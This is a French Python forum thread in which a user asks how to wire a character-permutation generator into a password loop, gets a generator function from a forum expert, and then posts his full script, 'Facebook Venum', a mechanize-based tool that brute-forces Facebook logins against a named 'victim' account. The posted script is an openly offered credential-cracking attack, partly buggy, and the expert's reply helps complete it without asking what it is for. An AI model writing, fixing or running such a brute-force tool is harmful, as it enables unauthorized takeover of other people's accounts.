IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Python Discussion :

Comment joindre ce code de permutations a cette variable sous un bloc try: ?


Sujet :

Python

  1. #1
    Nouveau Candidat au Club
    Homme Profil pro
    Technicien maintenance
    Inscrit en
    Décembre 2014
    Messages
    5
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 28
    Localisation : France, Hérault (Languedoc Roussillon)

    Informations professionnelles :
    Activité : Technicien maintenance

    Informations forums :
    Inscription : Décembre 2014
    Messages : 5
    Points : 1
    Points
    1
    Par défaut Comment joindre ce code de permutations a cette variable sous un bloc try: ?
    Bonjour à tous, j'ai ce code pour les permutations :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    from itertools import product
     
    for i in range(16):
         for perm in product("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", repeat=i):
              print("".join(perm))
    Je le voudrais dans un block avec une variable avant.

    La variable serait relative à une partie du script entier. Ma question est comment joindre le code pour les permutations ci-dessus à la variable sous un bloc Merci

    -Nix

  2. #2
    Expert éminent

    Homme Profil pro
    Inscrit en
    Octobre 2008
    Messages
    4 302
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Belgique

    Informations forums :
    Inscription : Octobre 2008
    Messages : 4 302
    Points : 6 782
    Points
    6 782
    Par défaut
    Salut,

    Qu'est-ce que tu désire obtenir, en fait ?

    Tout d'abord, as-tu testé ton code ? Ta boucle sur itertools.product() prendra plusieurs minutes d'exécution. On parle en centaine de millions de combinaisons, là.

    D'autre part, ceci ne sert à rien:
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
     
           randoms = print("".join(perm))
    le retour de print() est None.

    On pourra mieux te conseiller si tu nous expliques ce que tu as besoin de faire.

  3. #3
    Nouveau Candidat au Club
    Homme Profil pro
    Technicien maintenance
    Inscrit en
    Décembre 2014
    Messages
    5
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 28
    Localisation : France, Hérault (Languedoc Roussillon)

    Informations professionnelles :
    Activité : Technicien maintenance

    Informations forums :
    Inscription : Décembre 2014
    Messages : 5
    Points : 1
    Points
    1
    Par défaut
    Salut, non je n'ai pas testé mon code parce que si j'essaie de construire la liste entière d'options, l'ordinateur va me balancé une erreur mémoire après avoir bugé à mort... Ce que j'ai besoin de faire c'est de générer en séquences, toutes les possibilités de combinaisons des caractères du code précédemment cité sur une rangé de 6 à 15 et de joindre ce code à une variable qui est elle même relié à une autre variable appellé dans ce code :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    def search():
        global password
        for password in passwords:
            attack(password.replace("\n",""))
    Tu comprends ?

    Et après construire un générateur pour éviter l'erreur mémoire.

  4. #4
    Expert éminent

    Homme Profil pro
    Inscrit en
    Octobre 2008
    Messages
    4 302
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Belgique

    Informations forums :
    Inscription : Octobre 2008
    Messages : 4 302
    Points : 6 782
    Points
    6 782
    Par défaut
    Alors met ça dans une fonction.

    Par exemple:
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
     
    def get_pass(n):
        for i in range(n):
            for perm in product("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", 
                                repeat=i):
                yield perm
     
     
    def search():
        global password
        for password in get_pass(16):
            ...

  5. #5
    Nouveau Candidat au Club
    Homme Profil pro
    Technicien maintenance
    Inscrit en
    Décembre 2014
    Messages
    5
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 28
    Localisation : France, Hérault (Languedoc Roussillon)

    Informations professionnelles :
    Activité : Technicien maintenance

    Informations forums :
    Inscription : Décembre 2014
    Messages : 5
    Points : 1
    Points
    1
    Par défaut
    Merci pour ta réponse, je vais essayer ce code et je te recontacte si j'ai un problème

  6. #6
    Nouveau Candidat au Club
    Homme Profil pro
    Technicien maintenance
    Inscrit en
    Décembre 2014
    Messages
    5
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 28
    Localisation : France, Hérault (Languedoc Roussillon)

    Informations professionnelles :
    Activité : Technicien maintenance

    Informations forums :
    Inscription : Décembre 2014
    Messages : 5
    Points : 1
    Points
    1
    Par défaut
    VinsS Le code que tu m'as donné fonctionne mais bien que le script entier ne donne aucune erreur dans mon terminal Linux il retourne directement a sans même donner une erreur mémoire ou faire défiler les combinaisons... Dois-je utiliser un , si oui ou le placer, si non d'où vient le problème ? ^^ Je peux te donner le script entier si tu veux y jeter un coup d'oeil mais en privé si tu le veux bien Merci de ta compréhension.

  7. #7
    Expert éminent

    Homme Profil pro
    Inscrit en
    Octobre 2008
    Messages
    4 302
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Belgique

    Informations forums :
    Inscription : Octobre 2008
    Messages : 4 302
    Points : 6 782
    Points
    6 782
    Par défaut
    Ton script n'exécute peut-être pas tout ce que tu attends de lui.


    Il est préférable que tu mettes ton script dans ce forum, ça permet à d'autres de pouvoir donner leur avis.

  8. #8
    Nouveau Candidat au Club
    Homme Profil pro
    Technicien maintenance
    Inscrit en
    Décembre 2014
    Messages
    5
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 28
    Localisation : France, Hérault (Languedoc Roussillon)

    Informations professionnelles :
    Activité : Technicien maintenance

    Informations forums :
    Inscription : Décembre 2014
    Messages : 5
    Points : 1
    Points
    1
    Par défaut Mon script
    VinsS Voilà mon script, le code que tu m'as donné précedemment ne ressort pas d'erreur mais ne fait pas défiler les combinaisons pour autant et renvoit directement à sur mon terminal Linux, je me demande si un serait utile et si oui où le placer ? Si non d'où vient le problème ? Merci d'avance pour ta future réponse. Cordialement Nicolas. Au fait joyeuses fêtes de fin d'années. :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    #!usr/bin/python
     
    import random
    import sys
    import mechanize
    import cookielib 
     
     
    GHT = '''
            +=======================================+
            |..........Facebook Venum...............|
            +---------------------------------------+
            |#Author: Nicolas Contamine             |
            |                                       |
            |#Date: 18/12/2015                      |
            |#This tool is made for pentesting.     |
            |                                       |
            |                                       |
            |                                       |
            |""I do not take any responsibilities   |
            | for the usage of this program""       |                 
            +=======================================+
            |..........Facebook Venum...............|
            +---------------------------------------+
    '''
    print "Note: - This tool can crack facebook account even if you don't have the email of your victim"
    print "# Hit CTRL+C to quit the program"
    print "# No wordlist needed"
    print "# This script use an integrated alphanumeric all randoms wordlist with lower and upper case letters and digits from 6 to 15 range for an exact total of 853058370935030464 randoms"
     
    email = str(raw_input("# Enter |Email| |Phone number| |Profile ID number| |Username| : "))
     
    useragents = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
     
    login = 'https://www.facebook.com/login.php?login_attempt=1'
     
     
     
    def attack(password):
     
      try:
         sys.stdout.write("\r[*] trying %s " % password)
         sys.stdout.flush()
         br.addheaders = [('User-agent', random.choice(useragents))]
         site = br.open(login)
         br.select_form(nr=0)
     
     
         ##Facebook
         br.form['email'] = email
         br.form['pass'] = password
         br.submit()
         log = br.geturl()
         if log != login:
            print "\n\n\n[*] Password found .. !!"
            print "\n[*] Password : %s\n" % (password)
            sys.exit(1)
      except KeyboardInterrupt:
            print "\n[*] Exiting program .. "
            sys.exit(1)
     
    def search():
        global password
        for password in get_pass(16):
            attack(password.replace("\n",""))
     
     
     
    def check():
     
        global br
        global passwords
        try:
           br = mechanize.Browser()
           cj = cookielib.LWPCookieJar()
           br.set_handle_robots(False)
           br.set_handle_equiv(True)
           br.set_handle_referer(True)
           br.set_handle_redirect(True)
           br.set_cookiejar(cj)
           br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
        except KeyboardInterrupt:
           print "\n[*] Exiting program ..\n"
           sys.exit(1)    
     
     
     
    def get_pass(n):
     
        for i in range(n):
            for perm in product("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", 
                                repeat=i):
                yield perm   
        try:
            print GHT
            print "[*] Account to crack : %s" % (email)
            print "[*] Cracking, please wait ..."
        except KeyboardInterrupt:
            print "\n[*] Exiting program ..\n"
            sys.exit(1)
        try:
            search()
            attack(password)
        except KeyboardInterrupt:
            print "\n[*] Exiting program ..\n"
            sys.exit(1)
     
    if __name__ == '__main__':
        check()

Discussions similaires

  1. Comment joindre dans une ligne de code
    Par egg3774 dans le forum VBA Access
    Réponses: 4
    Dernier message: 25/01/2008, 15h35
  2. [Hardware portable] Comment entrer un code Ascii?
    Par l.sage dans le forum Ordinateurs
    Réponses: 13
    Dernier message: 11/08/2005, 13h04
  3. [Juridique] Comment réutiliser le code source d'une classe ?
    Par mathieu dans le forum Général Java
    Réponses: 8
    Dernier message: 17/05/2004, 13h40
  4. [VB.NET] Comment ecrire du code entre <title>
    Par ykane dans le forum ASP.NET
    Réponses: 5
    Dernier message: 10/05/2004, 16h58
  5. [debutant] comment appliquer le code d'un bouton
    Par philippejuju dans le forum MFC
    Réponses: 3
    Dernier message: 20/01/2004, 10h56

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo